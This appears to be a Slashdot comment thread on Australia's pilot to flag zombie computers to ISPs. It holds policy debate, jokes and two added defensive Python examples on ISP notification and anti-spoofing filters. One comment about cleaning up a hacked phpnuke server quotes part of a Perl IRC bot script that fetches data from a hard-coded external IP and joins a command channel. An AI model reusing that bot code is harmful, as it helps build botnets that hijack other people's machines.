AU Government To Pilot Target Zombies
msblack writes "
Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"
"When will U.S. regulators"..."get on board?"
Well I hope never. ISPs should have the right to protect their network, so they should be allowed to stop zombie systems when they feel like it. But for U.S. regulation, I say no way. All regulation does is make loopholes for the bad guys and road blocks for the good guys. ISPs should be willing to work with their customers to ensure this doesn't happen; that is why a lot of ISPs are offering free protection software to their Windows users, partially because other big names are doing it so they can stay competitive, and partially because with less spam and viruses on their network they can more easily manage it. With US Government control it will be like "your system is a zombie, fix it." To most people who only have a passing idea what a virus or spyware/adware is, most really won't know how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hiring expensive techs to fix it, they will toss their computer saying it is broken, or sue ISPs and the Government for disconnecting their ISP without giving them a means to remove it. Also systems like P2P, BitTorrent, and some distributed computing systems, all with legal uses, could be considered a zombie system to some people like the entertainment industry, who can use that to force all people using the technology even for non-entertainment uses (such as downloading Linux distros)
Government control adds rigidly defined rules to a flexible universe and often will cause more harm than good.
If something is so important that you feel the need to post it on the internet... It probably isn't that important.
Zombies are just one type, we need to start identifying the Vampires and ghouls.
They cause MUCH more havoc than simple zombies.
liqbase
msblack writes "Australian news sources are reporting that government officials will begin deploying infected pilots. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie citizens ask their caretakers to submit them or risk being zombified themselves. When will U.S. regulators and military get on board?"
and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?
slippery slope!
Seriously, how hard is it not to press the big red "No" button on a dubious site that asks you to install software that tracks the weather/vacuums your carpet/makes coffee? The warning is quite clear on all the browsers, I think, why are people still doing it?
Send email from the afterlife! Write your e-will at Dead Man's Switch.
Pilot Target Zombies Yup we're flying these new fangled target zombies around.
No France
Sorry, couldn't help it.
Will Uma Thurman star?
In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?
Our local cable and DSL providers are always shutting connections off for users whose computers are virus-ridden. If your PC is acting as an open spam proxy or found to be connecting to zombie networks, they shut you off, and you have to call to find out why. They recommend a service or software to help clean your PC, and they won't let you back on until you're free of any malware.
It's been like this for...years?
Pure, raw, unadulterated situation: congress doesn't care. The big ISPs don't care. They have had 10 years to address the situation and have refused all along. They are, however, willing to pass laws preventing unsecured wireless access points. Given a choice between lending support to MPAA/RIAA or actually addressing a serious problem, be it hacking, phishing, worms, viral attacks, DDOS attacks or any other legitimate issue.... look at it like this: how quickly have they acted to prevent the zombie issue? How quickly did they act to try and sneak the broadcast flag into law. Again? Or again?
Start writing campaign checks and picking up the tab for "fact finding missions" to Hawaii for a senator or ten... then you might find some interest on the hill.
If the g'vt kept the data on you that google does you'd better believe you'd be calling it "doing evil"
I got my hopes up for a second. I thought, "Finally! Those fat cats in Canberra are taking some action to prepare for the imminent impending zombie pandemic."
My elation was premature. This is just some lame story about computers sending spam.
Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
Slashdot: 24 hours behind every other site or your money back!
It would be cool if ISPs proposed some anti-malware strategies to their customers, maybe send some Linux distro :)
I agree botnets are a problem and that my ISP has a right to stop me from being a nuisance to the rest of the internet. But outside of that do I really want my ISP taking broad arbitrary decisions on what I can do with my connection?
"Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
We should be able to find a technical solution to this without having to get the government involved in what amounts to censorship. I'm not saying we don't have a problem, but I am confident that the last thing we want is to have hundreds of additional employees at the FCC regulating traffic on the internet and sending nasty letters to people asking them to conform or be disconnected.
Think about what would happen if the FCC were running around sending letters to people about computers that might be sending traffic they've deemed as disruptive? Couldn't the administrators at the FCC just use that as a pretext to monitor for P2P traffic? No thanks, Big Brother.
------ Tim O'Brien
"AU government to target Microsoft's indifferent security"
How many zombie movies do we need to point out that the government experimenting on zombies is very dangerous and foolish? Get rid of the zombies with a bullet or whack to the head and be happy.
From the article: "Anthony Wing, manager of the anti-spam team at the ACMA, told ZDNet UK sister site ZDNet Australia that the application, which took "some months" to build, can identify computers physically located in Australia that are being used for "illicit reasons".
"[The application] identifies IP addresses that have been used for illicit reasons -- for example spamming," Wing said. "There are a range of sensors around the world that identify them. Those infected IP addresses are then fed to the relevant ISP. They know who their customers are so they can contact them... if the computer remains a threat to other Internet users, the ISPs may take steps under their acceptable use policy to disconnect the computer until the problem is resolved".
...The ISPs will then be responsible for contacting their customers and helping them disinfect their computers.
This is great, assuming that:
$nice = $webHosting + $domainNames + $sslCerts
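The article's pipeline (sensors flag an address, the address is fed to the ISP that owns it, the ISP maps it to a customer) is worth seeing end to end, because the one detail that decides whether the right customer gets the letter is the observation time: dynamic addresses change hands. The following is an added example, not code from the article, the ACMA or any ISP. The ISP names, prefixes, lease records and sensor reports are all constructed sample data using RFC 5737 documentation ranges.

```python
"""Added example, not code from the article, ACMA or any ISP: route a feed of
sensor-reported zombie addresses to the responsible ISP and, on the ISP side,
match each address to the customer who held it when it was observed.
ISP names, prefixes, lease records and sensor reports are constructed sample
data (RFC 5737 documentation ranges)."""
from collections import defaultdict
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Constructed allocation table: (prefix, ISP). A more specific prefix can be
# sub-allocated to another ISP, so lookups must use longest-prefix match.
ISP_PREFIXES = [
    (ip_network("192.0.2.0/24"), "isp-a"),
    (ip_network("198.51.100.0/24"), "isp-b"),
    (ip_network("198.51.100.128/25"), "isp-c"),
]


def isp_for(ip):
    """Longest-prefix match of an address against the allocation table."""
    addr = ip_address(ip)
    best = None
    for net, isp in ISP_PREFIXES:
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, isp)
    return best[1] if best else None


def utc(*args):
    """Shorthand for a timezone-aware UTC timestamp."""
    return datetime(*args, tzinfo=timezone.utc)


# Constructed sensor feed: (address, time observed in UTC, reason).
SENSOR_REPORTS = [
    ("198.51.100.7", utc(2005, 11, 6, 9, 40), "spam"),
    ("198.51.100.7", utc(2005, 11, 6, 9, 45), "spam"),    # same host, repeat hit
    ("198.51.100.200", utc(2005, 11, 6, 10, 0), "scanning"),
    ("192.0.2.33", utc(2005, 11, 6, 10, 5), "spam"),
    ("203.0.113.9", utc(2005, 11, 6, 10, 7), "spam"),     # no ISP on record
]


def reports_by_isp(reports):
    """Group reports per ISP, keeping the earliest observation for each
    (address, reason) pair so an ISP gets one ticket per problem, not one per hit.
    Reports whose address matches no allocation are grouped under None."""
    first_seen = {}
    for ip, seen, reason in reports:
        key = (isp_for(ip), ip, reason)
        if key not in first_seen or seen < first_seen[key]:
            first_seen[key] = seen
    grouped = defaultdict(list)
    for (isp, ip, reason), seen in sorted(first_seen.items(), key=lambda kv: kv[1]):
        grouped[isp].append((ip, seen, reason))
    return dict(grouped)


# ISP side: constructed DHCP lease history, (address, customer, start, end).
# An address alone does not identify a customer; the observation time must
# fall inside the lease, or the notice goes to whoever held the address before.
LEASES = [
    ("198.51.100.7", "cust-1001", utc(2005, 11, 5, 22, 0), utc(2005, 11, 6, 9, 30)),
    ("198.51.100.7", "cust-1002", utc(2005, 11, 6, 9, 30), utc(2005, 11, 7, 9, 30)),
]


def customer_at(ip, when):
    """Customer holding `ip` at `when`, or None if no lease covers that time."""
    for lease_ip, customer, start, end in LEASES:
        if lease_ip == ip and start <= when < end:
            return customer
    return None


if __name__ == "__main__":
    for isp, items in reports_by_isp(SENSOR_REPORTS).items():
        print(isp, items)
    print(customer_at("198.51.100.7", utc(2005, 11, 6, 9, 40)))
```

Two points the sample data is built to show: the 9:40 report on 198.51.100.7 lands on cust-1002, although cust-1001 held the same address ten minutes earlier, and the report for 203.0.113.9 ends up in the None bucket because no allocation covers it, which is the case an operator has to handle rather than silently drop.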
If there are the right incentives, the zombie problem will go away.
E.g. if the user somehow feels it is necessary, he'll take care of his machine.
I know of people who know full well their computer will get infected with malware. They do it anyway, because they figure it won't cost them anything. Their ISP won't bug them, nor the phone company, nor anyone they DDOS, etc. They simply don't care.
That's why I want multiple waves of hardware-destroying worms. Worms that ruin your mobo month after month, until people wake up and see that proper administration is good for them too.
Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can do is disconnect it, and that just leads to support calls and whining from the (l)user. Which is why it isn't done (duh!)
http://www.thebricktestament.com/the_law/when_to_
I think not. Free speech does not include the right to shout "Fire!" in a crowded theatre, and free use of the Internet does not include the right to allow your machines to stuff it up for the rest of us.
As a Telstra customer who saw his cable connection slow to about 1/100th of its normal speed thanks to the DNS attacks of a few months ago, I'm glad to see someone doing something about the problem.
Il n'y a pas de Planet B.
I'm a broke geek. I host my website on a machine in my house. Last few weeks I've caught my machine being used for zombie purposes. Attack vector was a vulnerability in phpnuke.
Let me explain "why I use that holy piece of shit"
The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (I'm thinking vbulletin) and I've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)
So today the website freezes up again. Thanks to the fact that I'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up occasionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former Windows admins disappear to Redmond in the great Microsoft rapture of 2006.
Ok.. SSH into the machine. Same as before, same exploit.
poo:~# ls -al /tmp
total 20
drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl
Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and changed permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.
Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.
Finally I looked at bot.txt.
# IRC
my @adms=("bigfirex"); # admin nicks
my @canais=("#testebot");
use LWP::Simple;
my $dados=get("http://66.185.162.241/...fusao/nick/index.php");
my $nick=$dados; # bot nick.. if the nick is already in use, it will show up with a random number at the end
my $ircname = $dados;
chop (my $realname = `uname -n`);
$servidor='irc.igs.ca' unless $servidor; # IRC server to use if none is given as an argument
my $porta='6667'; # IRC server port
Ahh here it got interesting. I now had an IRC channel, with a room name. I tried connecting, but my machine was banned from the IRC server.
I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"
I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.
I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immediate action banning this guy from the network.
I did a /who 0 and found an IRC op from IGS.ca. Below is a log of the chat I had with him.
[msg(elsif)] hi are you an ircop?
[elsif(jake@admin.igs.ca)] sure
[msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
[msg(elsif)] The bot is being run by a user named bigfirex in a channel called #testebot.
[elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
[msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this network
[elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
[elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their
> When will U.S. regulators ... get on board?
Never, I hope. Do you want to be forbidden to use an unlicensed operating system?
Hint: I think you meant to write "law enforcement" rather than "regulators".
Warning: this article may contain humor, sarcasm, parody, and perhaps even irony. Read at your own risk.
What are the privacy implications of a government doing this?
I am all for some sort of system that finds a way of shutting down bots and will even admit that I would not mind seeing user's required to care for their computers (making them responsible for what is on their machines). Having said that, my experience is that so far in the cyber-world, governments have not been able to pass legislation that deals with these kinds of things in an effective manner. Governments are too much "brick and mortar" to really grasp the ether qualities of the cyber world.
The lesson that I think should be taken from this actions are that "we" (internet users and providers alike) should be finding ways to self-regulate so that we do not have to deal with big brother deciding to do it for us.
There are places where the two worlds need to cooperate and come together. Some laws need to be written to deal with crimes unique to the cyber-world for instance.
"When will U.S. regulators ... get on board?"
Never, because all U.S. lawmakers are in the pocket of Big Zombie.
Ok, I'm sorry guys, it's time for me to fess up. I'm on this task force and what actually happened was this. Me and the other sys admins for the AU Gov were sitting around playing DooM when our Boss walked in and yelled "what the hell are you guys doing?! The good tax payers aren't paying you to play games..."
;-)
We had to think of something quick so I told him we were cleaning infected zombies from the network, which, if you think about it, is at least partially accurate. He then left muttering something about "keep up the good work" and next thing I know suddenly all the other managers and politicians want their networks cleaned. Now it's a national headline.
Hey! My bad!
How can you suggest murdering all those innocent zombies that never harmed anyone outside their normal feeding habits? You insensitive clod!
Zombie Rights!
And you nailed it - the problem is what the definition of a "zombie" is. I'm pretty sure they could make a good case for just about anything.
We don't need that kind of regulation. No way.
- It's not the Macs I hate. It's Digg users. -
Hopefully never. Well, U.S. regulators anyway.
ISP's should be protecting their own networks. Saved bandwidth costs alone should be enough reason for them to want to detect and block zombies. The last thing we need is more government intervention.
http://www.hardcorepawn.com/zombie4/
I'm pretty sure (sarcasm) that in the past, there's been a number of IE vulnerabilities that allow this crap to be installed without any user notice. And it might not even come in with IE - it might come in some other way that the user is completely unaware of.
- It's not the Macs I hate. It's Digg users. -
Seriously, if you are not a geek, you wouldn't even know what the term "Zombie" even means... Why don't ISPs and others take out a TV/Radio campaign to say "Are you at risk?" The common people will then perhaps think, maybe my computer IS unsafe and attempt to do something about it...
We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
How do you say "evil zombies" in French? "Malfaiteurs de Zombi?" I bet some people are wondering that right now (since they can't get to work this morning, what with their cars having been torched by nocturnal zombie throngs). Le *sigh*.
Don't disappoint your bird dog. Go to the range.
Brains!!!!!
Firstly, having SPAM/DOS attacks going out of your network can't be good for PR or business.
But more to the point, having this stuff on their network spewing data chews up bandwidth (and bandwidth isn't free)
A good place to start is for ISPs to block ports known to be used by these zombies (e.g. the port that the "owners" of the zombie network use to send commands/targets/spam messages etc to the zombies). Blocking these ports probably wouldn't cost very much and would (in theory) stop the zombies from actually being given any instructions.
Is it illegal for me to make my own network into bots for distributed computing? Will I need a "bot license"? Maybe notification is a government service, but mandatory bot disconnection is invasion of my privacy. And with government's error rates, it's another threat to my nonbot computers.
--
make install -not war
Where do I get a remote control to pilot these "target zombies"?
Why do people drive drunk?
Why do people speed?
Why do people not signal their lane changes?
People are going to make mistakes, whether it be malicious, idiocy, or the warm coating of ignorance, they will do things that can potentially harm others. There are laws against most of the things people can do to harm others, but not yet on the Internet.
Why is this? Why must I put up with having my cable modem constantly being scanned? Why, when there is nothing happening on my system, can I generate a several-meg tcpdump log that contains hundreds of scans that keep a constant noise-floor of traffic going?
People are dumb. The government should have laws to protect me from dumb people as much as possible.
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
wasn't halloween last week?
Qantas has had John Travolta flying his 707 with their paint job for years now.
One line blog. I hear that they're called Twitters now.
Read the article again, folks: "IP addresses that have been used for illicit reasons -- for example spamming." (emphasis added)
The Aussies are after all kinds of zombies, not just spam zombies. Zombie PCs can be (and have been) used to launch DDoS attacks -- and IP spoofing works just fine for these purposes. I said illicit computer operators could spoof their IPs, not that they could spoof it to send spam. Read more carefully!
$nice = $webHosting + $domainNames + $sslCerts
This is white-hat hacking at its best. Can we get a +5 over here, please?
"Now this morning, we will begin piloting these zombies, identified here, here, and here. Your mission is to stop the spread of this nonsensical idea that Foster's is Australian for beer."
Some of these titles are not exactly the clearest things in the world. Perhaps "Australia's New Pilot Project to Stop Zombies" would have been better?
Other than that gaffe, on the topic, it isn't the place of governments of democratic republics to engage in attacking malware on the citizenry's machines. It is the job of the citizenry and when government Internet connected resources are besieged by this crap code then they should be taking up the issue with ISPs and notifying them and holding their abuse departments' feet to the fire on this. Otherwise they should leave the public at large to deal with this themselves. Next thing, they'll tell us what apps they consider malware. Oh wait, that whole DMCA and copying and decoding software nonsense...
If my grammar and spelling are off, I am [distracted/tired/careless] (take your pick)
Personally (and as a network sysadmin for a building network... not an ISP, but close) I'm all for restrictions on what happens on the network. In my building, if I don't notice what you are doing, I'm not going to stop you; however if I notice something causing problems for the rest of the building (zombies, spam, P2P, whatever) I'm shutting your ass down. And yes, I have shut down P2P users.
you should read everything on the internet as if it had "but I'm probably talking out of my ass" appended to it.
I worked for a small ISP in the US and we were diligent about getting users to clean their PCs. If they didn't comply, their service got turned off until they could. Primarily we used IDS to detect zombies and such. But sometimes they would actually affect the service of other users. It really isn't that bad if you keep on top of it. But of course, it is a small ISP with no more than 10,000 users. Maybe Comcast, et al would find the initial task of identifying and notifying thousands of users to be daunting.
-matthew
"THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
Bah, Iowa Telecom have been cutting their users off for some time now, they get a warning and then they cut you off. I know cos once these people get cut off they come to me to fix it up for them, it's a lucrative deal for me as my small company is building a reputation for getting it right first time, but I personally feel that we should be hitting HP, Dell, etc to stop installing crap spyware infested software to begin with, and to build pre-installed clean computers with adequate protection right out of the box. Still the users themselves are to blame too, as well as MS for leaving all the doors open in the name of usability!!! It's funny reading this article as I have another 2 computers waiting to be re-installed and setup cleanly!
Specifically Roger highspeed cable internet provider. They have disconnected a few of my clients' computers, due to being infected with some trojan/spyware/virus etc.
After my clients said on the phone that "I will try and maintain an infection-free computer, and run current antivirus software", they reconnect my clients.
I don't actually mind so much that they disconnect people, if they are infected with some sort of virus. Saves the rest of the people from being infected.
Money cannot buy happiness, but can buy something soo darn close, that you can't really tell the difference
I for one enjoyed the hell out of sniffing traffic coming from bots/spammers, and loved to do nothing more than de-authorize someone's cablemodem's MAC address :)
Then, when they called to bitch, we told them to take the box to a computer repair shop and get it a clean bill of health, or wipe it and come back when it's clean.
If people with brains set abuse policy at ISPs, they would not have to monitor or go looking for infected machines. http://www.spamcop.net/ notifies hundreds of ISPs daily that machines in their network are spam bombing the world, and most (especially the big ones, like Comcast and Roadrunner), do not do squat about it.
Policy should be: "If your machine sends spam, even without your knowledge, you WILL be disconnected."
Same policy should apply to virus-infected machines, but the big ISPs just do not give a flying fig. Every time some clueless user's machine starts sending me viruses, I report it to the source ISP. Smaller companies usually take action and at least notify the customer. But when it is a big ISP, the viruses come daily (sometimes multiple times daily) for weeks on end. The real pisser is the source IP address is always the same, so identifying the infected machine is not difficult, they just won't do it.
Ignorance is curable, stupid is forever.
Unfortunately, too many ISPs apparently don't enforce forgery-protection, so UDP-based attacks can still work, and it's hard to trace them back to their source. A couple of examples of attacks include the Slammer worm which used very small UDP packets to attack a database, and many of the DDOS attacks which send a small request "from" the victim to servers that send a big response (e.g. DNS smurfing attacks), allowing a low-bandwidth attacker to trick other machines into sending a large attack against the victim. There are large ISPs that enforce spoof-proofing, but it's not everybody yet, or attacks like this would be much less common.
There are special cases - if a customer is multi-homed to multiple ISPs, the ISPs have to be careful not to mess up the multi-homing (typically by adding routes to their tables), and if a customer has a block of addresses (e.g. a /24 with 253 addresses), customer machines at that site can forge packets "from" other addresses at that site, but that's a less important attack because you can still trace and filter that attack traffic if it's attacking you.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
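The spoof-proofing the post describes is source-address validation at the customer edge, and the two special cases it raises (a multi-homed customer, and a customer with a whole block who can still forge addresses inside it) are exactly where a naive filter goes wrong. The following is an added example, not code from the post or from any router vendor; it models the decision in plain Python. Port names, customer prefixes and packets are constructed sample data using RFC 5737 documentation ranges, and "ports" here are hypothetical customer-facing interfaces.

```python
"""Added example, not code from the post or any vendor: source-address
validation at an ISP's customer edge, the 'spoof-proofing' the post refers to.
Port names, prefixes and packets are constructed sample data (RFC 5737 ranges)."""
from ipaddress import ip_address, ip_network

# Constructed: the prefixes each customer port may legitimately source.
# p3 is a multi-homed customer: besides the block this ISP assigned, it also
# sends traffic from the block its other ISP assigned, so both must be listed
# here or that customer's legitimate traffic would be dropped.
CUSTOMER_PREFIXES = {
    "p1": [ip_network("192.0.2.16/28")],
    "p2": [ip_network("192.0.2.32/32")],
    "p3": [ip_network("198.51.100.0/24"), ip_network("203.0.113.0/24")],
}


def source_allowed(ingress_port, src_ip):
    """True if src_ip may legitimately arrive on ingress_port.
    A port with no prefix list fails closed."""
    prefixes = CUSTOMER_PREFIXES.get(ingress_port)
    if prefixes is None:
        return False
    addr = ip_address(src_ip)
    return any(addr in net for net in prefixes)


def filter_packets(packets):
    """Split (port, src, dst, proto) packets into (forwarded, dropped)."""
    forwarded, dropped = [], []
    for pkt in packets:
        port, src = pkt[0], pkt[1]
        (forwarded if source_allowed(port, src) else dropped).append(pkt)
    return forwarded, dropped


def ports_for_source(src_ip):
    """Customer ports that could legitimately have sourced src_ip. This is
    what keeps traffic traceable when a sender forges another address inside
    its own block: the filter passes it, but it can only have come from here."""
    addr = ip_address(src_ip)
    return sorted(port for port, nets in CUSTOMER_PREFIXES.items()
                  if any(addr in net for net in nets))


# Constructed packets: (ingress port, source, destination, protocol).
PACKETS = [
    ("p1", "192.0.2.20", "192.0.2.100", "tcp"),      # genuine source on p1
    ("p1", "203.0.113.9", "192.0.2.100", "udp"),     # forged: not p1's space
    ("p3", "203.0.113.9", "192.0.2.100", "udp"),     # same address, but p3 is multi-homed
    ("p3", "198.51.100.250", "192.0.2.100", "udp"),  # forged inside p3's own /24: passes, traceable to p3
    ("p9", "192.0.2.20", "192.0.2.100", "tcp"),      # unknown port: fail closed
]

if __name__ == "__main__":
    fwd, drp = filter_packets(PACKETS)
    print("forwarded:", fwd)
    print("dropped:", drp)
    print("198.51.100.250 could only have come from:", ports_for_source("198.51.100.250"))
```

The fourth packet is the post's "less important" case: the filter cannot tell that 198.51.100.250 was forged, but ports_for_source pins it to p3, so the abuse desk still knows which customer to call. Adding a second ISP's block to p3 is the multi-homing caveat; forgetting it would drop the third packet, which is legitimate.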
People who are too lazy to clean their computer will claim it evolved its zombie like behavior and it's not actually the work of an intelligent entity outside of the computer ;)
The US doesn't regulate, it just declares war!
:)
War on terror, War on Drugs,
War on hurricane katrina (I saw the army kicking doors in on TV)
Now a war on Zombies... that's right up Bush's alley
...ISPs are providing total security suites to protect their customers against internet plagues. If an ISP customer is protected by his ISP's security suite, he can't be blamed for its not working properly.